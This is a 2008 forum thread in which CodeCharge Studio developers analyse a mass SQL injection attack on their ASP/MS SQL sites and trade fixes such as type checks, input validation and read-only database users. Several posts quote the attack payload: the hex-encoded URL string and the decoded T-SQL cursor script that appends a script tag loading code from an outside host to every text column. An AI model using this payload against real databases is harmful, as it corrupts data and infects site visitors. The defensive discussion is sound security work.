TheunisP
Posts: 342
|
| Posted: 05/19/2008, 4:47 AM |
|
hi guys, wondered if somebody had had the same - we were hit by a sql injection last night - the bugger makes an entry to a js file m.js - just deleted 376 000 something lines - it doesn't seem to add records but rather edit them
all our systems have the normal CSS password protection and all data (admin areas) are protected - so I have no idea how it got through
|
 |
 |
TheunisP
Posts: 342
|
| Posted: 05/19/2008, 7:33 AM |
|
ok this is what they injected it seems: it follows whatever parameters you have for your page
ps. this is not the complete text if cut out a whole lot in the middle
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0
040004300200076006100720063006800610072002800320
035003500290020004400450043004C0041005200450020005400610062006C0065005.........4E004400200043004C004F
005300450020005400610062006C0065005F004300750072
0073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075007
20073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
|
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/19/2008, 8:23 AM |
|
quick update: we have confirmed that the injection was done through a page with a grid (not editable grid or record - basic display grid)
reported this to support
|
|
|
|
tsgroman
Posts: 64
|
| Posted: 05/19/2008, 10:33 AM |
|
TheunisP,
Please keep us updated!
|
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/19/2008, 11:11 AM |
|
I've figured out that they manage to sneak the sql thru by appending it to a parameter - when CCS builds the where the second set of ql statements become part of what gets send to the server - your select executes followed by the code below - what worries me is that although this code only appends data it doesn't take much to change it to delete data or replace data. the actual attack times out (because the update injected runs for a while - it goes thru each and every user table and each and every text,vchar column) - still it managed a decent 370k updates on our server before the time-out
for your info the code that is injected:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.qiqigm.com/m.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
|
|
|
|
ReneS
Posts: 225
|
| Posted: 05/19/2008, 1:14 PM |
|
Hi,
I found this one: http://www.simple-talk.com/community/blogs/tony_davis/a...4/29/49004.aspx
Are they right?
My question to you is, do you use stored procedures to add/edit/delete to your database?
Rene
|
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/19/2008, 1:38 PM |
|
Rene, this is not exactly what happens - and no there is no SP's - this happens in a page with a simple search & grid (there is record as such on the page for edit/new etc.)
what happens (as far as I can tell from the logs):
the injection got hold of a url either from a users pc or google where the url had a search parameter in it
e.g.
page.asp?s_Keyword=waarrara
what it did then is to add that piece of code I posted behind it before calling the page e.g.
page.asp?s_Keyword=waarrara';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST......
now when CCS build the search query (SELECT whatever FROM warra) the injection code gets added afterwords as an addiiotional SQL statement
the SELECT gets executed, then SQL starts with the next statement e.g. the declare of the local var it then CAST converts the hex values to a valid statment and then runs it
as you can see from the injection code is that it actually reads all of your tables and then rertrieves all the text etc. columns and start appending data.
the weak point and how they get through is by relying on the fact that we don't check search parameters (e.g. the user can search for anything, meaning by that that we can't really check what they search for e.g. how do you validate a search term?)
|
|
|
|
mamboBROWN
Posts: 1713
|
| Posted: 05/19/2008, 7:59 PM |
|
TheunisP
Have you reported this to support?? Assuming what you said is true I am almost sure that they would like to know this information immediately ( http://support.yessoftware.com ).
|
|
|
|
tsgroman
Posts: 64
|
| Posted: 05/19/2008, 10:25 PM |
|
Yes. He reported this to support: see post, this thread, 05/19/2008, 8:23 AM.
TheunisP,
What did support tell you? Please keep us updated as to what you find out from Yes.
|
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/20/2008, 7:44 AM |
|
ok, stil haven't heard from support but I've found 1 instance so far
CCDLookup
say you pass a parameter and you then use this parameter to do a lookup - the way CCS does these is that it takes your where as is and builds the sql now given the right circumstances the injection's code will get executed - tested it and I was wable to modify and add data
seems we have a couple of solutions e.g.
in the common cddlookup we can check what is passed to the where and stop it there
or (can someone help here) stop MS SQL from executing multiple statements
for the rest of CCS I've tested a couple of scenarios and it seems that CCS, although not by design, stops the injection - you get really nasty SQL errors
|
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/21/2008, 2:57 AM |
|
Support came back and suggest using the ToSQL() function (someting I almost never use) before you use the CCDLookup - I'm going to check my code, make the changes and pray for the best
|
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/21/2008, 4:45 AM |
|
after looking at the toSQL function I'm not sure that is gonna work to well
no I know that this injections are done through the lookup - fyi this is the way I'm leaning
to get the key I'm going to replace the normal ccgetparam with
Iif(IsNumeric(CCGetParam("intKeyValue",0)),CCGetParam("intKeyValue",0),0)
this will ensure that if I get a key passed that it is numeric - while if it has garbage in it or is absent I'll get a 0
|
|
|
|
lwismanuel
Posts: 39
|
| Posted: 05/21/2008, 12:04 PM |
|
According to this site http://hackademix.net/2008/04/26/ a lot of sites have been attacked using that nasty code: DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
|
|
|
|
RonB
Posts: 228
|
| Posted: 05/22/2008, 12:11 AM |
|
First of this is not a problem specific to codecharge. It also only touches sqlserver and asp from what I have read.
A simple clean up of your search parameters would stop this or am I mistaken? In php I use strip_tags() to clean up search parameters so any php and html is stripped before being send to the database. I found this piece of asp on the web that might do the same in asp as strip_tags() does for PHP:
Function stripHTML(strHTML)
'Strips the HTML tags from strHTML
Dim objRegExp, strOutput
Set objRegExp = New Regexp
objRegExp.IgnoreCase = True
objRegExp.Global = True
objRegExp.Pattern = "<(.|\n)+?>"
'Replace all HTML tag matches with the empty string
strOutput = objRegExp.Replace(strHTML, "")
'Replace all < and > with < and >
strOutput = Replace(strOutput, "<", "<")
strOutput = Replace(strOutput, ">", ">")
stripHTML = strOutput 'Return the value of strOutput
Set objRegExp = Nothing
End Function
Quote :
This looks to like it would clean up and prevent the attack. I'm no asp programmer so.....????
Ron
|
|
|
|
wkempees
Posts: 1679
|
| Posted: 05/22/2008, 3:43 AM |
|
Even the addition of Validation to the search fields, should be helpful.
Making sure a search field can only accept what is expected, posting an error if not or strip out the excessive characters.
As to the ToSQL(), it is best practice to use that anywhere you have posted values going to the DB.
Walter
_________________
Origin: NL, T:GMT+1 (Forumtime +9)
CCS3/4.01.006 PhP, MySQL .Net/InMotion(Vista/XP, XAMPP)
if you liked this info PAYPAL me: http://donate.consultair.eu
|
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/22/2008, 4:02 AM |
|
@w have a look what the toSQL does for numbers - wouldn't make much difference - either CCS must put a IsNumeric in there - or you will have to do a custome cleanup
@R thanks R, but stripping out the HTML (or js) wont do much in this case
|
|
|
|
Vasiliy
Posts: 378
|
| Posted: 05/22/2008, 6:46 AM |
|
If someone is interested, we resolved the problem with SQL injections (or I think so :)
Considering that here and there we have calls to SQL Server with parameters, we made a global protection on web-app level by checking every value of every parameter on data type.
If parameter value has characters (or strings) that are not acceptable for this parameter name we either remove this parameter, or redirect to error page.
I created a dictionary of parameter data types that we can expect from request.
For example parameters are: int, decimal, safestring, savehtml, unsavehtml.
In our web-app every page has 2 include files: header and footer.
In page header I added a parser, that checks every passed parameter for every request.
This parser validates (regex) data in parameter value with data type, assigned for parameter name.
This approach, validate every parameter for entire web-app, made our app secure against sql injections.
_________________
Vasiliy |
|
|
|
CodeChargenewbie
Posts: 114
|
| Posted: 05/22/2008, 7:12 AM |
|
Just my two cents.
Stored procedures would be of help, one would think, as it only takes parameters. And you can conduct a check of said parameters within the procedure, such as checking the length and/or type.
Validations would be helpful, as well. And checking input values before you include them in your embedded sql would also be helpful.
I had thought ToSQL is a construct that allows your sql statement to work for any sql database. I wasn't aware that it had certain protection schemes...
Actually, this is a good link to bookmark for such things:
http://www.devarticles.com/c/a/MySQL/SQL-Injection-Attacks-Are-You-Safe/2/
|
|
|
|
CodeChargenewbie
Posts: 114
|
| Posted: 05/22/2008, 7:20 AM |
|
Quote Vasiliy:
If someone is interested, we resolved the problem with SQL injections (or I think so :)
Considering that here and there we have calls to SQL Server with parameters, we made a global protection on web-app level by checking every value of every parameter on data type.
If parameter value has characters (or strings) that are not acceptable for this parameter name we either remove this parameter, or redirect to error page.
I created a dictionary of parameter data types that we can expect from request.
For example parameters are: int, decimal, safestring, savehtml, unsavehtml.
In our web-app every page has 2 include files: header and footer.
In page header I added a parser, that checks every passed parameter for every request.
This parser validates (regex) data in parameter value with data type, assigned for parameter name.
This approach, validate every parameter for entire web-app, made our app secure against sql injections.
All?!? How would know if it's a safe string, which are the worst offenders, imo. Say the user is entering a name or street address in the web app, which will be inserted into the database. How would ensure its integrity?
|
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/22/2008, 7:48 AM |
|
@Vasiliy That should do it - as said the problem was specific to uncheck numeric - if we did a basic check if the type was correct it would have stopped the injection
@CodeChargenewbie In actual fact CCS kinda stops injection via strings/text - so they are lesser offenders in this case - although I had a look the injection actually tries to ad itself to both a string and numeric - hoever in our situation the text one failed time and again to inject either due to CCS stopping it our code stopping it
|
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/22/2008, 8:03 AM |
|
maybe I should just take a sec and xplain how it does it - summarize the 1st few posts
the injection attaches a piece of text at the back of your url and after your normal url parameters
so for instance this is how it would like normally:
index.asp?intKey=999
now it attached this:
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST{0x44...00%20AS%20NVARCHAR(4000));EXEC(@S);
or
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST{0x44...00%20AS%20NVARCHAR(4000));EXEC(@S);
(notice the ' in the one and the other)
after the cast you will notice a string that starts with 0x this is the start of a hex sequence that if you cast it back to decimal and convert the ascii to chars will give you a valid sql set of statements
the injection hopes that you will take your url parameter and do something on sql with it without checking the content or type
in essence you will send a statement(s) to sql:
select * from table where key=XXXX
the XXX is whatever you retrieved from your url parameter
now normally there should only be numeric value - but after the injection got hold of it you have another couple of sql statements that follow
sql will execute your statement and dutifully start executing the injected statements
the absolute beauty of this attack is that you provide the login for the malware and secondly the script doesn't need to know how your database is structured since the database is going to give it to them
I suppose at this point we can argue that something like the stored procedure that returns your table names and their column names shouldn't be available - point taken but that is a different issue
what scared me is that the script could have deleted the data or dropped the tables which it didn't - that is a plus
unfortunately the script is so easy to understand that I can promise you - as I type this - a script kiddie is adapting it to do much worse in the future
so I suggest whatever you want to do to protect your systems to do it quick - according to the media the 1st run attacked over 30 000 sites, the second run a conservative estimate put it at over 400 000 sites
Our logs indicated that the script tried it tried it on 6 of our 9 sites - average attacks per server were between 5 and 10 times - variations
and it took only one to change more than 370 000 of our records
|
|
|
|
lwismanuel
Posts: 39
|
| Posted: 05/23/2008, 1:42 PM |
|
We should know better never to trust user input and sanitize whatever is pass by the user to our apps. This I attack could it been avoided by following some simple security precaution. For instance, the user on my default database connection has read only permission then if I have to delete, insert or update I do something like this: // your existing database connection with read only credential
$db = new clsDBConnection();
// Change the DB user with right to add a record
$db->connect(database, host, port, user, password);
$SQL = "INSERT INTO report (report_task_id,report_creator) ".
"VALUES (". $db->ToSQL(CCGetFromGet("task_id",0),ccsInteger) .",". $db->ToSQL(CCGetUserID(),ccsInteger) .")";
$db->query($SQL);
$db->close();
As I said before, always check user input. If you are querying a record where the field is x amount big in length then why not chop the string by x. or if the string is alphanumeric sanitize the variable for the type of variable you are expecting.
Security should always be a big concern even if the apps we develop does not hold vital data. We all should put our two cents to develop more secure apps.
|
|
|
|
Oper
Posts: 1195
|
| Posted: 05/26/2008, 6:47 PM |
|
since we always use ccgetparam to get parameter and only during odd reason search are and parameters are greater than 20 or 30 chars we modify the ccgetparam and cut the return always by 25.
not a NASA technology but dont have to modify anything in your code. and work perfect
also at the end of the ccgetparam
you could replace "< ( ; > )" since only during odd reason this will get used
or better and more short for sql Injection the multi command execution is need just replace ";" dot and Comma for space.
_________________
____________________________
http://www.7bz.com (Free CMS,CRM Developed in CCS)
http://www.PremiumWebTemplate.com
Affiliation Web Site Templates
Please do backup first |
|
|
|
TheunisP
Posts: 342
|
| Posted: 05/29/2008, 5:59 AM |
|
ok - sorry not replying on posts (I just don't know why I typed that excplanation if nobody reads it before replying)
anyway - an update Yes sent me a updated common.ccl which they claim that will solve problem - checked now neither the Looukp or toSQL was changed (either one would have fixed it) - so I mailed them back - asking if they could point out where the changes are
I should also point out that this was a ASP upgrade component only - while the problem is not just in ASP
BTW - has anyone seen this little padding funciton in the common library? CCAddZero?
|
|
|
|
|
